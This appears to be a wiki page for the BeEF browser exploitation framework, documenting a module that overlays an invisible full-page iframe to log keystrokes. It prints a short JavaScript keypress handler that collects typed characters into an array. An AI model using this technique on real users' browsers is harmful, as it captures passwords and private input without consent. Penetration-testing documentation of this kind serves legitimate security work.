-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: iFrame Event Key Logger
Jess Williams edited this page Jan 13, 2020
·
2 revisions
-
Objective: Log keys through a 100% iframe overlay
-
Authors: antisnatchor
-
Browsers: all except Opera
Adds a 100% size invisible iframe and an event listener that fires on keypress.
// add the pressed key to the keystroke stream array
function keyPressHandler(evt) {
evt = evt || window.event;
if (evt) {
var keyCode = evt.charCode || evt.keyCode;
charLogged = String.fromCharCode(keyCode);
stream.push(charLogged);
}
}
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK